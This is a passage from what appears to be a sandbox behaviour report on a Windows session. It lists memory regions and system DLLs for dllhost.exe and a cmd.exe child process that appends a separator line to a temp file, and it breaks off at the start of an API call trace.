region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2761 start_va = 0x7ff972270000 end_va = 0x7ff972283fff entry_point = 0x7ff972270000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 2762 start_va = 0x7ff973b90000 end_va = 0x7ff973babfff entry_point = 0x7ff973b90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2763 start_va = 0x7ff973bb0000 end_va = 0x7ff973bd5fff entry_point = 0x7ff973bb0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2764 start_va = 0x7ff973be0000 end_va = 0x7ff973bebfff entry_point = 0x7ff973be0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2765 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2766 start_va = 0x7ff976f70000 end_va = 0x7ff976f77fff entry_point = 0x7ff976f70000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2767 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2768 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2769 start_va = 0x7ff96cc10000 end_va = 0x7ff96cc21fff entry_point = 0x7ff96cc10000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2770 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Thread: id = 236 os_tid = 0x4bc Thread: id = 237 os_tid = 0x4a8 Process: id = "28" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x3c6a4000" os_pid = "0x8b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x834" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2771 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2772 start_va = 0x5b10d40000 end_va = 0x5b10d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10d40000" filename = "" Region: id = 2773 start_va = 0x5b10d50000 end_va = 0x5b10d56fff entry_point = 0x0 region_type = private name = "private_0x0000005b10d50000" filename = "" Region: id = 2774 start_va = 0x5b10d60000 end_va = 0x5b10d73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10d60000" filename = "" Region: id = 2775 start_va = 0x5b10d80000 end_va = 0x5b10e7ffff entry_point = 0x0 region_type = private name = "private_0x0000005b10d80000" filename = "" Region: id = 2776 start_va = 0x5b10e80000 end_va = 0x5b10e83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10e80000" filename = "" Region: id = 2777 start_va = 0x5b10e90000 end_va = 0x5b10e91fff entry_point = 0x0 region_type = private name = "private_0x0000005b10e90000" filename = "" Region: id = 2778 start_va = 0x5b10ea0000 end_va = 0x5b10ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10ea0000" filename = "" Region: id = 2779 start_va = 0x5b10eb0000 end_va = 0x5b10eb6fff entry_point = 0x0 region_type = private name = "private_0x0000005b10eb0000" filename = "" Region: id = 2780 start_va = 0x5b10ec0000 end_va = 0x5b10ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10ec0000" filename = "" Region: id = 2781 start_va = 0x5b10ed0000 end_va = 0x5b10ed0fff entry_point = 0x0 region_type = private name = "private_0x0000005b10ed0000" filename = "" Region: id = 2782 start_va = 0x5b10ee0000 end_va = 0x5b10ee0fff entry_point = 0x0 region_type = private name = "private_0x0000005b10ee0000" filename = "" Region: id = 2783 start_va = 0x5b10ef0000 end_va = 0x5b10ef2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b10ef0000" filename = "" Region: id = 2784 start_va = 0x5b10f00000 end_va = 0x5b10ffffff entry_point = 0x0 region_type = private name = "private_0x0000005b10f00000" filename = "" Region: id = 2785 start_va = 0x5b11000000 end_va = 0x5b110bdfff entry_point = 0x5b11000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2786 start_va = 0x5b110c0000 end_va = 0x5b111bffff entry_point = 0x0 region_type = private name = "private_0x0000005b110c0000" filename = "" Region: id = 2787 start_va = 0x5b111c0000 end_va = 0x5b112bffff entry_point = 0x0 region_type = private name = "private_0x0000005b111c0000" filename = "" Region: id = 2788 start_va = 0x5b112c0000 end_va = 0x5b112cffff entry_point = 0x0 region_type = private name = "private_0x0000005b112c0000" filename = "" Region: id = 2789 start_va = 0x5b112d0000 end_va = 0x5b11606fff entry_point = 0x5b112d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2790 start_va = 0x5b11610000 end_va = 0x5b1170ffff entry_point = 0x0 region_type = private name = "private_0x0000005b11610000" filename = "" Region: id = 2791 start_va = 0x5b11710000 end_va = 0x5b1180ffff entry_point = 0x0 region_type = private name = "private_0x0000005b11710000" filename = "" Region: id = 2792 start_va = 0x5b11810000 end_va = 0x5b1190ffff entry_point = 0x0 region_type = private name = "private_0x0000005b11810000" filename = "" Region: id = 2793 start_va = 0x5b11910000 end_va = 0x5b11a97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b11910000" filename = "" Region: id = 2794 start_va = 0x5b11aa0000 end_va = 0x5b11c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b11aa0000" filename = "" Region: id = 2795 start_va = 0x5b11c30000 end_va = 0x5b1302ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b11c30000" filename = "" Region: id = 2796 start_va = 0x5b13030000 end_va = 0x5b1312ffff entry_point = 0x0 region_type = private name = "private_0x0000005b13030000" filename = "" Region: id = 2797 start_va = 0x5b13140000 end_va = 0x5b13141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b13140000" filename = "" Region: id = 2798 start_va = 0x5b13160000 end_va = 0x5b1316ffff entry_point = 0x0 region_type = private name = "private_0x0000005b13160000" filename = "" Region: id = 2799 start_va = 0x7df5ff040000 end_va = 0x7ff5ff03ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff040000" filename = "" Region: id = 2800 start_va = 0x7ff7a7a3e000 end_va = 0x7ff7a7a3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7a3e000" filename = "" Region: id = 2801 start_va = 0x7ff7a7a40000 end_va = 0x7ff7a7b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7a7a40000" filename = "" Region: id = 2802 start_va = 0x7ff7a7b40000 end_va = 0x7ff7a7b62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7a7b40000" filename = "" Region: id = 2803 start_va = 0x7ff7a7b63000 end_va = 0x7ff7a7b64fff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b63000" filename = "" Region: id = 2804 start_va = 0x7ff7a7b65000 end_va = 0x7ff7a7b66fff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b65000" filename = "" Region: id = 2805 start_va = 0x7ff7a7b67000 end_va = 0x7ff7a7b68fff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b67000" filename = "" Region: id = 2806 start_va = 0x7ff7a7b69000 end_va = 0x7ff7a7b6afff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b69000" filename = "" Region: id = 2807 start_va = 0x7ff7a7b6b000 end_va = 0x7ff7a7b6cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b6b000" filename = "" Region: id = 2808 start_va = 0x7ff7a7b6d000 end_va = 0x7ff7a7b6efff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b6d000" filename = "" Region: id = 2809 start_va = 0x7ff7a7b6f000 end_va = 0x7ff7a7b6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7a7b6f000" filename = "" Region: id = 2810 start_va = 0x7ff7a7d50000 end_va = 0x7ff7a7d56fff entry_point = 0x7ff7a7d50000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2811 start_va = 0x7ff966de0000 end_va = 0x7ff966e2afff entry_point = 0x7ff966de0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 2812 start_va = 0x7ff96b4f0000 end_va = 0x7ff96b763fff entry_point = 0x7ff96b4f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 2813 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2814 start_va = 0x7ff9733b0000 end_va = 0x7ff973445fff entry_point = 0x7ff9733b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2815 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2816 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2817 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2818 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2819 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2820 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2821 start_va = 0x7ff975310000 end_va = 0x7ff9753c2fff entry_point = 0x7ff975310000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2822 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2823 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2824 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2825 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2826 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2827 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2828 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2829 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2830 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2831 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2832 start_va = 0x7ff977d40000 end_va = 0x7ff977de4fff entry_point = 0x7ff977d40000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2833 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2834 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2835 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2836 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2837 start_va = 0x7ff974c30000 end_va = 0x7ff975257fff entry_point = 0x7ff974c30000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2838 start_va = 0x7ff975900000 end_va = 0x7ff976e24fff entry_point = 0x7ff975900000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2839 start_va = 0x7ff976f80000 end_va = 0x7ff977025fff entry_point = 0x7ff976f80000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2840 start_va = 0x7ff977360000 end_va = 0x7ff9773b0fff entry_point = 0x7ff977360000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2841 start_va = 0x5b13130000 end_va = 0x5b13130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b13130000" filename = "" Region: id = 2842 start_va = 0x5b13170000 end_va = 0x5b13182fff entry_point = 0x5b13170000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 2843 start_va = 0x5b13190000 end_va = 0x5b13190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b13190000" filename = "" Region: id = 2844 start_va = 0x7ff969650000 end_va = 0x7ff969ab9fff entry_point = 0x7ff969650000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2845 start_va = 0x7ff973090000 end_va = 0x7ff973107fff entry_point = 0x7ff973090000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2846 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2847 start_va = 0x7ff960130000 end_va = 0x7ff96022ffff entry_point = 0x7ff960130000 region_type = mapped_file name = "mfmp4srcsnk.dll" filename = "\\Windows\\System32\\mfmp4srcsnk.dll" (normalized: "c:\\windows\\system32\\mfmp4srcsnk.dll") Region: id = 2848 start_va = 0x7ff96dec0000 end_va = 0x7ff96deeffff entry_point = 0x7ff96dec0000 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 2849 start_va = 0x7ff96f770000 end_va = 0x7ff96f77afff entry_point = 0x7ff96f770000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2850 start_va = 0x5b13150000 end_va = 0x5b13158fff entry_point = 0x5b13150000 region_type = mapped_file name = "3i_obgb9p_hr_np.mp4" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\3i_Obgb9P_hr_Np.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\3i_obgb9p_hr_np.mp4") Region: id = 2851 start_va = 0x7ff96dd70000 end_va = 0x7ff96de7bfff entry_point = 0x7ff96dd70000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 2852 start_va = 0x7ff9755b0000 end_va = 0x7ff9755f3fff entry_point = 0x7ff9755b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2853 start_va = 0x7ff96b330000 end_va = 0x7ff96b39afff entry_point = 0x7ff96b330000 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 2854 start_va = 0x7ff970ee0000 end_va = 0x7ff971091fff entry_point = 0x7ff970ee0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2855 start_va = 0x7ff9600b0000 end_va = 0x7ff96012afff entry_point = 0x7ff9600b0000 region_type = mapped_file name = "mfmkvsrcsnk.dll" filename = "\\Windows\\System32\\mfmkvsrcsnk.dll" (normalized: "c:\\windows\\system32\\mfmkvsrcsnk.dll") Region: id = 2856 start_va = 0x7ff96e3f0000 end_va = 0x7ff96e481fff entry_point = 0x7ff96e3f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Thread: id = 242 os_tid = 0x7e4 Thread: id = 243 os_tid = 0x65c Thread: id = 244 os_tid = 0xaf0 Thread: id = 245 os_tid = 0x8bc Thread: id = 246 os_tid = 0x1c0 Thread: id = 247 os_tid = 0x680 Thread: id = 248 os_tid = 0xac8 Thread: id = 249 os_tid = 0x850 Thread: id = 250 os_tid = 0x24c Thread: id = 251 os_tid = 0x258 Thread: id = 252 os_tid = 0x270 Process: id = "29" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3ca2a000" os_pid = "0x86c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x834" cmd_line = "cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2857 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2858 start_va = 0xb4ee2d0000 end_va = 0xb4ee2effff entry_point = 0x0 region_type = private name = "private_0x000000b4ee2d0000" filename = "" Region: id = 2859 start_va = 0xb4ee2f0000 end_va = 0xb4ee303fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4ee2f0000" filename = "" Region: id = 2860 start_va = 0xb4ee310000 end_va = 0xb4ee40ffff entry_point = 0x0 region_type = private name = "private_0x000000b4ee310000" filename = "" Region: id = 2861 start_va = 0xb4ee410000 end_va = 0xb4ee413fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4ee410000" filename = "" Region: id = 2862 start_va = 0xb4ee420000 end_va = 0xb4ee420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4ee420000" filename = "" Region: id = 2863 start_va = 0xb4ee430000 end_va = 0xb4ee431fff entry_point = 0x0 region_type = private name = "private_0x000000b4ee430000" filename = "" Region: id = 2864 start_va = 0x7df5fff70000 end_va = 0x7ff5fff6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff70000" filename = "" Region: id = 2865 start_va = 0x7ff60d750000 end_va = 0x7ff60d772fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d750000" filename = "" Region: id = 2866 start_va = 0x7ff60d778000 end_va = 0x7ff60d778fff entry_point = 0x0 region_type = private name = "private_0x00007ff60d778000" filename = "" Region: id = 2867 start_va = 0x7ff60d77e000 end_va = 0x7ff60d77ffff entry_point = 0x0 region_type = private name = "private_0x00007ff60d77e000" filename = "" Region: id = 2868 start_va = 0x7ff60d9c0000 end_va = 0x7ff60da18fff entry_point = 0x7ff60d9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2869 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2870 start_va = 0xb4ee550000 end_va = 0xb4ee64ffff entry_point = 0x0 region_type = private name = "private_0x000000b4ee550000" filename = "" Region: id = 2871 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2872 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2912 start_va = 0xb4ee2d0000 end_va = 0xb4ee2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b4ee2d0000" filename = "" Region: id = 2913 start_va = 0xb4ee2e0000 end_va = 0xb4ee2e6fff entry_point = 0x0 region_type = private name = "private_0x000000b4ee2e0000" filename = "" Region: id = 2914 start_va = 0xb4ee440000 end_va = 0xb4ee4fdfff entry_point = 0xb4ee440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2915 start_va = 0xb4ee650000 end_va = 0xb4ee74ffff entry_point = 0x0 region_type = private name = "private_0x000000b4ee650000" filename = "" Region: id = 2916 start_va = 0xb4ee860000 end_va = 0xb4ee86ffff entry_point = 0x0 region_type = private name = "private_0x000000b4ee860000" filename = "" Region: id = 2917 start_va = 0x7ff60d650000 end_va = 0x7ff60d74ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff60d650000" filename = "" Region: id = 2918 start_va = 0x7ff60d77c000 end_va = 0x7ff60d77dfff entry_point = 0x0 region_type = private name = "private_0x00007ff60d77c000" filename = "" Region: id = 2919 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2920 start_va = 0xb4ee500000 end_va = 0xb4ee506fff entry_point = 0x0 region_type = private name = "private_0x000000b4ee500000" filename = "" Thread: id = 253 os_tid = 0x53c [0276.319] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff60d9c0000 [0276.319] __set_app_type (_Type=0x1) [0276.319] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff60d9d44a0) returned 0x0 [0276.319] __getmainargs (in: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8, _DoWildCard=0, _StartInfo=0x7ff60d9ef104 | out: _Argc=0x7ff60d9ef0e8, _Argv=0x7ff60d9ef0f0, _Env=0x7ff60d9ef0f8) returned 0 [0276.319] GetCurrentThreadId () returned 0x53c [0276.319] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x53c) returned 0x6c [0276.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0276.320] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetThreadUILanguage") returned 0x7ff977acd550 [0276.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.322] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xb4ee40f828 | out: phkResult=0xb4ee40f828*=0x0) returned 0x2 [0276.322] VirtualQuery (in: 